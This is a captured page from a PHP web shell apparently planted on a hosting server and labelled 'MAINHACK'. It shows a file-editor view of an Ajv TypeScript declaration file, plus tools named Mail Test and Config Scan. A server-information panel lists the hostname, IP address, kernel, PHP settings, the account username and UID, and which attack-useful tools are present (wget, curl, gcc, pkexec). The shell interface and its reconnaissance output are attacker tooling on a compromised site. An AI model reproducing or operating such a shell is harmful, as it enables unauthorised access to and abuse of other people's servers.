[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: index.d.ts
import type { AnySchema, AnySchemaObject, AnyValidateFunction, EvaluatedProperties, EvaluatedItems } from "../types"; import type Ajv from "../core"; import type { InstanceOptions } from "../core"; import { CodeGen, Name, Code, ValueScopeName } from "./codegen"; import { LocalRefs } from "./resolve"; import { JSONType } from "./rules"; export type SchemaRefs = { [Ref in string]?: SchemaEnv | AnySchema; }; export interface SchemaCxt { readonly gen: CodeGen; readonly allErrors?: boolean; readonly data: Name; readonly parentData: Name; readonly parentDataProperty: Code | number; readonly dataNames: Name[]; readonly dataPathArr: (Code | number)[]; readonly dataLevel: number; dataTypes: JSONType[]; definedProperties: Set<string>; readonly topSchemaRef: Code; readonly validateName: Name; evaluated?: Name; readonly ValidationError?: Name; readonly schema: AnySchema; readonly schemaEnv: SchemaEnv; readonly rootId: string; baseId: string; readonly schemaPath: Code; readonly errSchemaPath: string; readonly errorPath: Code; readonly propertyName?: Name; readonly compositeRule?: boolean; props?: EvaluatedProperties | Name; items?: EvaluatedItems | Name; jtdDiscriminator?: string; jtdMetadata?: boolean; readonly createErrors?: boolean; readonly opts: InstanceOptions; readonly self: Ajv; } export interface SchemaObjCxt extends SchemaCxt { readonly schema: AnySchemaObject; } interface SchemaEnvArgs { readonly schema: AnySchema; readonly schemaId?: "$id" | "id"; readonly root?: SchemaEnv; readonly baseId?: string; readonly schemaPath?: string; readonly localRefs?: LocalRefs; readonly meta?: boolean; } export declare class SchemaEnv implements SchemaEnvArgs { readonly schema: AnySchema; readonly schemaId?: "$id" | "id"; readonly root: SchemaEnv; baseId: string; schemaPath?: string; localRefs?: LocalRefs; readonly meta?: boolean; readonly $async?: boolean; readonly refs: SchemaRefs; readonly dynamicAnchors: { [Ref in string]?: true; }; validate?: AnyValidateFunction; validateName?: ValueScopeName; serialize?: (data: unknown) => string; serializeName?: ValueScopeName; parse?: (data: string) => unknown; parseName?: ValueScopeName; constructor(env: SchemaEnvArgs); } export declare function compileSchema(this: Ajv, sch: SchemaEnv): SchemaEnv; export declare function resolveRef(this: Ajv, root: SchemaEnv, baseId: string, ref: string): AnySchema | SchemaEnv | undefined; export declare function getCompilingSchema(this: Ajv, schEnv: SchemaEnv): SchemaEnv | void; export declare function resolveSchema(this: Ajv, root: SchemaEnv, // root object with properties schema, refs TODO below SchemaEnv is assigned to it ref: string): SchemaEnv | undefined; export {};
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium331.web-hosting.com
Server IP: 184.94.213.169
PHP Version: 8.1.34
Server Software: LiteSpeed
System: Linux premium331.web-hosting.com 4.18.0-553.80.1.lve.el8.x86_64 #1 SMP Wed Oct 22 19:29:36 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.88 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: livedhms
User ID (UID): 1344
Group ID (GID): 1349
Script Owner UID: 1344
Current Dir Owner: 1344